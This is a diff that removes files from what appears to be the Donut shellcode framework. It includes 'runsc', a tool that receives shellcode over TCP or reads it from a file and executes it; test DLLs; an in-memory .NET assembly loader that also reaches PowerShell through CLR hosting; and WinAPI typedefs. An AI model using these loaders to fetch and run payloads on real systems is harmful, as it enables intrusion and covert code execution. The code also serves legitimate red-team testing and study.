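-// keep reading until remote disconnects or we run out of memory
-printf ("[ receiving data\n");
-
-for (;;) {
-FD_ZERO(&fds);
-FD_SET(s, &fds);
-
-tv.tv_sec = 5;
-tv.tv_usec = 0;
-r = select(FD_SETSIZE, &fds, 0, 0, &tv);
-
-if (r <= 0) {
-printf ("[ waiting for data timed out or failed\n");
-break;
-}
-// receive a block
-r = recv(s, (uint8_t*)p->code + p->code_len, BUFSIZ, 0);
-if (r <= 0) break;
-p->code_len += r;
-// resize buffer
-pv = realloc(p->code, p->code_len + BUFSIZ);
-// on error, free pointer
-if(pv == NULL) {
-p->code_len = 0;
-free(p->code);
-p->code = NULL;
-printf("[ error: out of memory.\n");
-break;
-}
-p->code = pv;
-}
-if(p->code_len != 0) {
-printf ("[ received %i bytes\n", p->code_len);
-}
-}
-
-//
-int ssr (args_t *p)
-/**
-* PURPOSE : send a shellcode or receive one from remote system and execute it
-*
-* RETURN : 0 or length of shellcode sent/received
-*
-* NOTES : None
-*
-*F*/
-{
-int s, opt, r, t;
-fd_set fds;
-struct timeval tv;
-
-p->code_len=0;
-
-// create socket
-printf ("[ creating socket\n");
-s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
-if (s < 0) return 0;
-
-// ensure we can reuse socket
-t=1;
-setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t));
-
-// bind to port
-printf ("[ binding to port %s\n", p->port);
-r = bind(s, p->ai_addr, p->ai_addrlen);
-if (r == 0) {
-// listen
-r = listen (s, 1);
-if (r == 0) {
-printf ("[ waiting for connections on %s\n", addr2ip(p));
-if (r == 0) {
-t = accept(s, p->ai_addr, &p->ai_addrlen);
-printf ("[ accepting connection from %s\n", addr2ip(p));
-if (t > 0) {
-if (p->tx_mode == RSC_SEND) {
-send_data(p, t);
-} else {
-recv_data(p, t);
-xcode(p);
-}
-}
-}
-// close socket to peer
-shutdown(t, SHUT_RDWR);
-close(t);
-} else {
-perror("listen");
-}
-} else {
-perror("bind");
-}
-// close listening socket
-shutdown(s, SHUT_RDWR);
-close(s);
-
-return p->code_len;
-}
-
-/**F*****************************************************************/
-int csr (args_t *p)
-/**
-* PURPOSE : opens connection to remote system and sends shellcode
-*
-* RETURN : 0 or 1
-*
-* NOTES : None
-*
-*F*/
-{
-int s, r, opt;
-fd_set fds;
-struct timeval tv;
-
-printf ("[ creating socket\n");
-s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
-if (s < 0) return 0;
-
-// try connect to remote
-printf ("[ connecting to %s\n", addr2ip(p));
-r = connect(s, p->ai_addr, p->ai_addrlen);
-
-if (r == 0) {
-if (p->tx_mode==RSC_SEND) {
-send_data(p, s);
-} else {
-recv_data(p, s);
-xcode(p);
-}
-} else {
-xstrerror("connect");
-}
-printf ("[ closing connection\n");
-shutdown(s, SHUT_RDWR);
-close(s);
-return 1;
-}
-
-/**F*****************************************************************/
-void xfile(args_t *p)
-/**
-* PURPOSE : read contents of shellcode and attempt to execute it locally
-*
-* RETURN : Nothing
-*
-* NOTES : None
-*
-*F*/
-{
-FILE *fd;
-int len;
-void *pv;
-
-p->code_len = 0;
-p->code = NULL;
-
-printf ("[ reading code from %s\n", p->file);
-fd = fopen(p->file, "rb");
-
-if (fd == NULL) {
-xstrerror("fopen(\"%s\")", p->file);
-return;
-}
-// read contents of file
-for (;;) {
-// first loop? allocate block
-if(p->code == NULL) {
-p->code = malloc(BUFSIZ);
-}
-// read a block of data
-len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd);
-if (len <= 0) break;
-p->code_len += len;
-// resize buffer for next read
-pv = realloc(p->code, p->code_len + BUFSIZ);
-
-if(pv == NULL) {
-p->code_len = 0;
-free(p->code);
-p->code = NULL;
-printf("[ error: out of memory!.\n");
-break;
-}
-p->code = pv;
-}
-fclose(fd);
-
-if(p->code_len != 0) {
-xcode(p);
-}
-}
-
-#ifdef WIN
-void load_modules(char *names) {
-HMODULE mod;
-char *p = strtok(names, ";,");
-
-while (p != NULL) {
-printf ("[ loading %s...", p);
-mod = LoadLibrary(p);
-
-printf ("%s\n", mod==NULL ? "FAILED" : "OK");
-
-p = strtok(NULL, ";,");
-}
-}
-#endif
-
-/**F*****************************************************************/
-void usage (void) {
-printf ("\n usage: runsc <address> [options]\n");
-printf ("\n -4 Use IP version 4 (default)");
-printf ("\n -6 Use IP version 6");
-printf ("\n -l Listen mode (required when listening on specific interface)");
-#ifdef WIN
-printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon");
-#endif
-printf ("\n -f <file> Read PIC from <file>");
-printf ("\n -s <count> Simulate real process by creating file descriptors");
-printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT);
-printf ("\n -x Execute PIC (requires -f)");
-printf ("\n\n Press any key to continue . . .");
-getchar ();
-
-exit (0);
-}
-
-/**F*****************************************************************/
-char* getparam (int argc, char *argv[], int *i) {
-int n=*i;
-if (argv[n][2] != 0) {
-return &argv[n][2];
-}
-if ((n+1) < argc) {
-*i=n+1;
-return argv[n+1];
-}
-printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]);
-exit (0);
-}
-
-void parse_args (args_t *p, int argc, char *argv[]) {
-int i;
-char opt;
-
-// for each argument
-for (i=1; i<argc; i++)
-{
-// is this option?
-if (argv[i][0]=='-' || argv[i][1]=='/')
-{
-// get option value
-opt=argv[i][1];
-switch (opt)
-{
-case '4':
-p->ai_family=AF_INET;
-break;
-case '6': // use ipv6 (default is ipv4)
-p->ai_family=AF_INET6;
-break;
-case 'x': // execute PIC, requires -f
-p->mode=RSC_EXEC;
-break;
-case 'd': // debug the code
-p->dbg=1;
-break;
-case 'f': // file
-p->file=getparam(argc, argv, &i);
-break;
-case 'l': // listen for incoming connections
-p->mode=RSC_SERVER;
-break;
-#ifdef WIN
-case 'm': // windows only, loads modules required by shellcode
-p->modules = getparam(argc, argv, &i);
-break;
-#endif
-case 's': // create file descriptors before execution
-p->sim=atoi(getparam(argc, argv, &i));
-break;
-case 'p': // port number
-p->port=getparam(argc, argv, &i);
-p->port_nbr=atoi(p->port);
-break;
-case '?': // display usage
-case 'h':
-usage ();
-break;
-default:
-printf ("[ unknown option %c\n", opt);
-usage();
-break;
-}
-} else {
-// assume it's hostname or ip
-p->address=argv[i];
-p->mode=RSC_CLIENT;
-}
-}
-}
-
-int main (int argc, char *argv[]) {
-args_t args;
-struct stat st;
-
-#ifdef WIN
-//
-PVOID OldValue=NULL;
-WSADATA wsa;
-
-//Wow64DisableWow64FsRedirection (&OldValue);
-LoadLibrary("ws2_32");
-LoadLibrary("advapi32");
-
-WSAStartup(MAKEWORD(2,0), &wsa);
-#endif
-
-setbuf(stdout, NULL);
-setbuf(stderr, NULL);
-
-memset (&args, 0, sizeof(args));
-
-// set default parameters
-args.address = NULL;
-args.file = NULL;
-args.ai_family = AF_INET;
-args.port = DEFAULT_PORT;
-args.port_nbr = atoi(args.port);
-args.mode = -1;
-args.tx_mode = -1;
-args.sim = 0;
-args.dbg = 0;
-
-printf ("\n[ run shellcode v0.2\n");
-
-parse_args(&args, argc, argv);
-
-// check if we have file parameter and it accessible
-if (args.file!=NULL) {
-if (stat (args.file, &st)) {
-printf ("[ unable to access %s\n", args.file);
-return 0;
-}
-}
-
-#ifdef WIN
-if (args.modules != NULL) {
-load_modules(args.modules);
-}
-#endif
-// if mode is executing
-if (args.mode == RSC_EXEC) {
-if (args.file != NULL) {
-xfile(&args);
-return 0;
-} else {
-printf ("\n[ you've used -x without supplying file with -f");
-return 0;
-}
-}
-if (init_network(&args)) {
-// if no file specified, we receive and execute data
-args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND;
-
-// if mode is -1, we listen for incoming connections
-if (args.mode == -1) {
-args.mode=RSC_SERVER;
-}
-
-// if no file specified, set to receive one
-if (args.tx_mode == -1) {
-args.tx_mode = RSC_RECV;
-}
-
-if (args.mode == RSC_SERVER) {
-ssr (&args);
-} else {
-csr (&args);
-}
-}
-if(args.code_len != 0) {
-free(args.code);
-}
-return 0;
-}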
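--- a/payload/test/api_test.c
+++ b/payload/test/api_test.c
@@ -1,37 +0,0 @@
-
-#define UNICODE
-#include <windows.h>
-
-#include "donut.h"
-#pragma comment(lib, "user32.lib")
-
-void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
-typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR);
-
-int main(void) {
-HMODULE m;
-_DonutApiW DonutApiW;
-WCHAR param[4][DONUT_MAX_NAME]={L"arg0",L"arg1",L"arg2",L"arg3"};
-
-WCHAR msg[4096];
-
-_snwprintf(msg, ARRAYSIZE(msg),
-L"param[0] : %ws\r"
-L"param[1] : %ws\r"
-L"param[2] : %ws\r"
-L"param[3] : %ws\r",
-param[0], param[1], param[2], param[3]);
-
-MessageBox(NULL, msg, L"Donut Test", MB_OK);
-
-m = LoadLibrary(L"call_api_dll.dll");
-
-if(m != NULL) {
-DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW");
-if(DonutApiW != NULL) {
-call_api((FARPROC)DonutApiW, 4, param);
-}
-}
-return 0;
-}
-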
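--- a/payload/test/call_api_dll.c
+++ b/payload/test/call_api_dll.c
@@ -1,35 +0,0 @@
-#define WIN32_LEAN_AND_MEAN
-#define UNICODE
-
-#include <windows.h>
-#include "donut.h"
-
-#pragma comment(lib, "user32.lib")
-
-__declspec(dllexport)
-VOID APIENTRY DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
-WCHAR msg[4096];
-
-_snwprintf(msg, ARRAYSIZE(msg),
-L"param[0] : %s\r"
-L"param[1] : %s\r"
-L"param[2] : %s\r"
-L"param[3] : %s\r",
-arg0, arg1, arg2, arg3);
-
-MessageBox(NULL, msg, L"Donut Test", MB_OK);
-}
-
-__declspec(dllexport)
-BOOL APIENTRY DllMain(HMODULE hModule,
-DWORD ul_reason_for_call,
-LPVOID lpReserved) {
-switch (ul_reason_for_call) {
-case DLL_PROCESS_ATTACH:
-case DLL_THREAD_ATTACH:
-case DLL_THREAD_DETACH:
-case DLL_PROCESS_DETACH:
-break;
-}
-return TRUE;
-}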
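--- a/payload/test/hello.c
+++ b/payload/test/hello.c
@@ -1,56 +0,0 @@
-#define UNICODE
-
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/stat.h>
-#include <inttypes.h>
-
-#include <windows.h>
-#pragma comment(lib, "user32.lib")
-#pragma comment(lib, "shell32.lib")
-
-__declspec(dllexport)
-VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
-PROCESS_INFORMATION pi;
-STARTUPINFO si;
-
-ZeroMemory(&si, sizeof(si));
-si.cb = sizeof(si);
-CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
-
-ZeroMemory(&si, sizeof(si));
-si.cb = sizeof(si);
-CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
-}
-
-__declspec(dllexport)
-VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
-WCHAR msg[4096];
-
-_snwprintf(msg, ARRAYSIZE(msg),
-L"param[0] : %ws\r"
-L"param[1] : %ws\r"
-L"param[2] : %ws\r"
-L"param[3] : %ws\r",
-arg0, arg1, arg2, arg3);
-
-MessageBox(NULL, msg, L"Donut Test", MB_OK);
-}
-
-__declspec(dllexport)
-BOOL WINAPI DllMain(HMODULE hModule,
-DWORD ul_reason_for_call,
-LPVOID lpReserved) {
-switch (ul_reason_for_call) {
-case DLL_PROCESS_ATTACH:
-MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
-break;
-case DLL_THREAD_ATTACH:
-case DLL_THREAD_DETACH:
-case DLL_PROCESS_DETACH:
-break;
-}
-return TRUE;
-}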
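--- a/payload/test/hello.cs
+++ b/payload/test/hello.cs
@@ -1,16 +0,0 @@
-// A Hello World! program in C#.
-using System;
-namespace HelloWorld
-{
-class Hello
-{
-static void Main()
-{
-Console.WriteLine("Hello World!");
-
-// Keep the console window open in debug mode.
-Console.WriteLine("Press any key to exit.");
-Console.ReadKey();
-}
-}
-}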
+0
-440
payload/test/rdt.cpp less more
0
1 // code to implement hooking ProcessExit from unmanaged code
2 // https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8
3 //
4 #include <windows.h>
5 #include <oleauto.h>
6 #include <mscoree.h>
7 #include <comdef.h>
8 #include <propvarutil.h>
9 #include <metahost.h>
10
11 #include <cstdio>
12 #include <cstdint>
13 #include <cstring>
14 #include <cstdlib>
15 #include <sys/stat.h>
16
17 #import "mscorlib.tlb" raw_interfaces_only
18 #import "shdocvw.dll"
19
20 #pragma comment(lib, "mscoree.lib")
21
22 void my_function(void *evt) {
23 printf("Received event\n");
24 }
25
26 void DumpMethods(mscorlib::_TypePtr type) {
27 mscorlib::_MethodInfoPtr mi;
28 mscorlib::_ParameterInfoPtr pi;
29 mscorlib::_TypePtr ptype;
30 SAFEARRAY *sa, *params;
31 HRESULT hr;
32 LONG i, j, cnt, pcnt, lcnt, ucnt;
33 BSTR name;
34 VARIANT vt;
35 VARTYPE var;
36
37 hr = type->GetMethods(
38 (mscorlib::BindingFlags)
39 (mscorlib::BindingFlags_Static |
40 mscorlib::BindingFlags_Public),
41 &sa);
42
43 if(hr == S_OK) {
44 SafeArrayGetLBound(sa, 1, &lcnt);
45 SafeArrayGetUBound(sa, 1, &ucnt);
46
47 cnt = (ucnt - lcnt + 1);
48
49 for(i=0; i<cnt; i++) {
50 hr = SafeArrayGetElement(sa, &i, (void*)&mi);
51 if(hr == S_OK) {
52 mi->get_name(&name);
53 printf("%ws(", name);
54 hr = mi->GetParameters(&params);
55 if(hr == S_OK) {
56 SafeArrayGetLBound(params, 1, &lcnt);
57 SafeArrayGetUBound(params, 1, &ucnt);
58
59 pcnt = (ucnt - lcnt + 1);
60 printf("%i", pcnt);
61 for(j=0; j<pcnt; j++) {
62 hr = SafeArrayGetElement(params, &j, (void*)&pi);
63
64 // VARTYPE should be VT_UNKNOWN
65 hr = SafeArrayGetVartype(params, &var);
66 BSTR meth = SysAllocString(L"ParameterType");
67 DISPID id;
68 // hr = pi->GetIDsOfNames(IID_NULL, meth, 1, GetUserDefaultLCID(), &id);
69 //DISPATCH_METHOD, LOCALE_USER_DEFAULT, &id);
70 printf("HRESULT : %lx\n", hr);
71 }
72 }
73 printf(")\n");
74 }
75 }
76 }
77 }
78
79 void rundotnet(void *code, size_t len) {
80 HRESULT hr;
81 ICLRMetaHost *icmh;
82 ICLRRuntimeInfo *icri;
83 ICorRuntimeHost *icrh;
84 IUnknownPtr iu;
85 mscorlib::_AppDomainPtr ad;
86 mscorlib::_AssemblyPtr as, as1, as2, as3;
87 mscorlib::_MethodInfoPtr mi;
88 mscorlib::_EventInfoPtr nfo;
89 mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell;
90 mscorlib::_DelegatePtr delegate;
91 mscorlib::_ParameterInfoPtr param;
92 mscorlib::_EventHandlerPtr handler;
93 VARIANT v1, v2, v_ptr, v_type, ret;
94 SAFEARRAY *sa, *sa2, *sav;
95 SAFEARRAYBOUND sab;
96 BOOL loadable;
97 LONG idx;
98
99 printf("CoCreateInstance(ICorRuntimeHost).\n");
100
101 hr = CLRCreateInstance(
102 CLSID_CLRMetaHost,
103 IID_ICLRMetaHost,
104 (LPVOID*)&icmh);
105
106 if(SUCCEEDED(hr)) {
107 printf("ICLRMetaHost::GetRuntime\n");
108
109 hr = icmh->GetRuntime(
110 L"v4.0.30319",
111 IID_ICLRRuntimeInfo, (LPVOID*)&icri);
112
113 if(SUCCEEDED(hr)) {
114 printf("ICLRRuntimeInfo::IsLoadable\n");
115 hr = icri->IsLoadable(&loadable);
116
117 if(SUCCEEDED(hr) && loadable) {
118 printf("ICLRRuntimeInfo::GetInterface\n");
119
120 hr = icri->GetInterface(
121 CLSID_CorRuntimeHost,
122 IID_ICorRuntimeHost,
123 (LPVOID*)&icrh);
124 } else return;
125 } else return;
126 } else return;
127
128 printf("ICorRuntimeHost::Start()\n");
129 hr = icrh->Start();
130 if(SUCCEEDED(hr)) {
131 printf("ICorRuntimeHost::GetDefaultDomain()\n");
132 hr = icrh->GetDefaultDomain(&iu);
133 if(SUCCEEDED(hr)) {
134 printf("IUnknown::QueryInterface()\n");
135 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
136 if(SUCCEEDED(hr)) {
137 BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
138 // ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName
139 BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
140
141 BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
142
143 hr = ad->Load_2(str1, &as1); // load automation
144 hr = ad->Load_2(strX, &as3); // load interop services
145 printf("Loading System.Management.Automation : %lx\n", hr);
146 hr = ad->Load_2(str2, &as2); // load mscorlib
147
148 BSTR alloc = SysAllocString(L"Create");
149 BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell");
150 hr = as1->GetType_2(marshal, &mars);
151
152 printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars);
153
154 DumpMethods(mars);
155
156 // to retrieve a method, the SAFEARRAY is of IUnknown types
157 // this method doesn't accept anything, so just allocate array for it
158 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0);
159
160 hr = mars->GetMethod(alloc,
161 (mscorlib::BindingFlags)
162 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
163 NULL, // Binder
164 sav, // SAFEARRAY(_Type*)
165 NULL, // Modifiers
166 &mi); // MethodInfo
167
168 printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi);
169
170 v1.vt = VT_EMPTY;
171 VariantClear(&ret);
172
173 hr = mi->Invoke_3(
174 v1,
175 NULL, // arguments to method
176 &ret); // return value from method
177
178 printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError());
179
180 // at this point, we have the powershell object. we just need to call AddScript
181 // method, but this is an IDisposable
182
183 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
184 BSTR object = SysAllocString(L"System.Object");
185
186 as2->GetType_2(object, &ptr);
187 idx = 0;
188 SafeArrayPutElement(sav, &idx, ptr);
189
190 BSTR get_obj = SysAllocString(L"GetIUnknownForObject");
191 BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal");
192 hr = as3->GetType_2(mars_str, &mars);
193
194 printf("Marshal : %p\n", (PVOID)mars);
195
196 hr = mars->GetMethod(get_obj,
197 (mscorlib::BindingFlags)
198 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
199 NULL, // Binder
200 sav, // SAFEARRAY(_Type*)
201 NULL, // Modifiers
202 &mi); // MethodInfo
203
204 printf("GetMethod() : %lx %p\n", hr, (PVOID)mi);
205
206 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
207 idx = 0;
208 SafeArrayPutElement(sav, &idx, &ret.punkVal);
209
210 v1.vt = VT_EMPTY;
211 VARIANT unk;
212 VariantClear(&unk);
213
214 hr = mi->Invoke_3(
215 v1,
216 sav, // arguments to method
217 &unk); // return value from method
218
219 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk));
220 getchar();
221 return;
222
223 // SAFEARRAY(_Type*)
224 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2);
225
226 // add System.IntPtr
227 BSTR str4 = SysAllocString(L"System.IntPtr");
228 as2->GetType_2(str4, &ptr);
229 //DumpMethods(ptr);
230 idx = 0;
231 hr = SafeArrayPutElement(sav, &idx, ptr);
232
233 // add System.Type
234 BSTR str5 = SysAllocString(L"System.Type");
235 as2->GetType_2(str5, &type);
236 idx = 1;
237 SafeArrayPutElement(sav, &idx, type);
238
239 BSTR str6 = SysAllocString(L"GetIUnknownForObject");
240 BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal");
241 hr = as1->GetType_2(str3, &mars);
242
243 hr = mars->GetMethod(str6,
244 (mscorlib::BindingFlags)
245 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
246 NULL, // Binder
247 sav, // SAFEARRAY(_Type*)
248 NULL, // Modifiers
249 &mi); // MethodInfo
250
251 printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi);
252
253 BSTR str9 = SysAllocString(L"ProcessExit");
254 BSTR strA = SysAllocString(L"System.AppDomain");
255
256 hr = as2->GetType_2(strA, &evt);
257 printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
258
259 hr = evt->GetEvent(str9,
260 (mscorlib::BindingFlags)
261 (mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public),
262 &nfo);
263
264 printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo);
265
266 hr = nfo->get_EventHandlerType(&evt);
267 printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
268
269 BSTR type_name, base_name;
270 mscorlib::_TypePtr base_type, ref_type;
271
272 evt->get_name(&type_name);
273 evt->get_BaseType(&base_type);
274 base_type->get_name(&base_name);
275
276 wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name);
277
278 printf("my_function = %p\n", (void*)my_function);
279
280 // SAFEARRAY(VARIANT)
281 sav = SafeArrayCreateVector(VT_VARIANT, 0, 2);
282
283 VariantClear(&v_ptr);
284 V_BYREF(&v_ptr) = (PVOID)my_function;
285 V_VT(&v_ptr) = VT_INT;
286
287 idx = 0;
288 SafeArrayPutElement(sav, &idx, &v_ptr);
289
290 BSTR strZ = SysAllocString(L"System.MultiDelegate");
291 hr = as2->GetType_2(strZ, &type);
292 printf("System.Delegate = %lx, %p\n", hr, (void*)type);
293
294 idx = 1;
295 V_VT(&v_type) = VT_UNKNOWN;
296 V_UNKNOWN(&v_type) = type;
297 SafeArrayPutElement(sav, &idx, &type);
298
299 v1.vt = VT_EMPTY;
300 VariantClear(&ret);
301
302 printf("Calling GetDelegateForFunctionPointer\n");
303 hr = mi->Invoke_3(
304 v1,
305 sav, // arguments to method
306 &ret); // return value from method
307
308 printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret));
309
310 /**if(hr != S_OK) {
311 printf("Failed to obtain delegate\n");
312 return;
313 }*/
314
315 printf("Delegate : %p\n", ret.punkVal);
316
317 hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler);
318 printf("HRESULT : %08lx : %p\n", hr, (void*)handler);
319
320 hr = ad->add_ProcessExit(handler);
321 printf("HRESULT : %08lx\n", hr);
322
323 sab.lLbound = 0;
324 sab.cElements = len;
325 printf("SafeArrayCreate()\n");
326 sa = SafeArrayCreate(VT_UI1, 1, &sab);
327
328 if(sa != NULL) {
329 CopyMemory(sa->pvData, code, len);
330 printf("AppDomain::Load_3()\n");
331 hr = ad->Load_3(sa, &as);
332 if(SUCCEEDED(hr)) {
333 printf("Assembly::get_EntryPoint()\n");
334 hr = as->get_EntryPoint(&mi);
335 if(SUCCEEDED(hr)) {
336 v1.vt = VT_NULL;
337 v1.plVal = NULL;
338 printf("MethodInfo::Invoke_3()\n");
339 hr = mi->Invoke_3(v1, NULL, &v2);
340 mi->Release();
341 }
342 as->Release();
343 }
344 SafeArrayDestroy(sa);
345 }
346 ad->Release();
347 }
348 iu->Release();
349 }
350 icrh->Stop();
351 }
352 icrh->Release();
353 }
354
355 int main(int argc, char *argv[])
356 {
357 void *mem;
358 struct stat fs;
359 FILE *fd;
360
361 if(argc != 2) {
362 printf("usage: rundotnet <.NET assembly>\n");
363 return 0;
364 }
365
366 // 1. get the size of file
367 stat(argv[1], &fs);
368
369 if(fs.st_size == 0) {
370 printf("file is empty.\n");
371 return 0;
372 }
373
374 // 2. try open assembly
375 fd = fopen(argv[1], "rb");
376 if(fd == NULL) {
377 printf("unable to open \"%s\".\n", argv[1]);
378 return 0;
379 }
380 // 3. allocate memory
381 mem = malloc(fs.st_size);
382 if(mem != NULL) {
383 // 4. read file into memory
384 fread(mem, 1, fs.st_size, fd);
385 // 5. run the program from memory
386 rundotnet(mem, fs.st_size);
387 // 6. free memory
388 free(mem);
389 }
390 // 7. close assembly
391 fclose(fd);
392
393 return 0;
394 }
395
396 /**
397 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
398 BSTR i32 = SysAllocString(L"System.Int32");
399
400 as2->GetType_2(i32, &ptr);
401 idx = 0;
402 SafeArrayPutElement(sav, &idx, ptr);
403
404 BSTR alloc = SysAllocString(L"AllocHGlobal");
405 BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal");
406 hr = as1->GetType_2(marshal, &mars);
407
408 hr = mars->GetMethod(alloc,
409 (mscorlib::BindingFlags)
410 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
411 NULL, // Binder
412 sav, // SAFEARRAY(_Type*)
413 NULL, // Modifiers
414 &mi); // MethodInfo
415
416 printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr);
417
418 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
419 idx = 0;
420 V_VT(&v_type) = VT_I4;
421 V_I4(&v_type) = 0x12345678;
422 SafeArrayPutElement(sav, &idx, &v_type);
423
424 v1.vt = VT_EMPTY;
425 VariantClear(&ret);
426
427 printf("Press any key to continue...\n");
428 getchar();
429
430 printf("Calling AllocCoTaskMem\n");
431 hr = mi->Invoke_3(
432 v1,
433 sav, // arguments to method
434 &ret); // return value from method
435
436 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret));
437 getchar();
438 return;
439 */
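--- a/payload/winapi.h
+++ b/payload/winapi.h
@@ -1,414 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifndef WINAPI_H
-#define WINAPI_H
-
-#include <windows.h>
-
-typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds);
-
-typedef int (WINAPI *MultiByteToWideChar_t)(
-UINT CodePage,
-DWORD dwFlags,
-LPCCH lpMultiByteStr,
-int cbMultiByte,
-LPWSTR lpWideCharStr,
-int cchWideChar);
-
-typedef int (WINAPI *WideCharToMultiByte_t)(
-UINT CodePage,
-DWORD dwFlags,
-LPCWCH lpWideCharStr,
-int cchWideChar,
-LPSTR lpMultiByteStr,
-int cbMultiByte,
-LPCCH lpDefaultChar,
-LPBOOL lpUsedDefaultChar);
-
-// imports from shlwapi.dll
-typedef LSTATUS (WINAPI *SHGetValueA_t)(
-HKEY hkey,
-LPCSTR pszSubKey,
-LPCSTR pszValue,
-DWORD *pdwType,
-void *pvData,
-DWORD *pcbData);
-
-// imports from mscoree.dll
-typedef HRESULT (WINAPI *CLRCreateInstance_t)(
-REFCLSID clsid,
-REFIID riid,
-LPVOID *ppInterface);
-
-typedef HRESULT (WINAPI *CorBindToRuntime_t) (
-LPCWSTR pwszVersion,
-LPCWSTR pwszBuildFlavor,
-REFCLSID rclsid,
-REFIID riid,
-LPVOID FAR *ppv);
-
-// imports from ole32.dll
-typedef HRESULT (WINAPI *CoInitializeEx_t)(
-LPVOID pvReserved,
-DWORD dwCoInit);
-
-typedef void (WINAPI *CoUninitialize_t)(void);
-
-typedef HRESULT (WINAPI *CoCreateInstance_t)(
-REFCLSID rclsid,
-LPUNKNOWN pUnkOuter,
-DWORD dwClsContext,
-REFIID riid,
-LPVOID *ppv);
-
-typedef HRESULT (WINAPI *CreateStdDispatch_t)(
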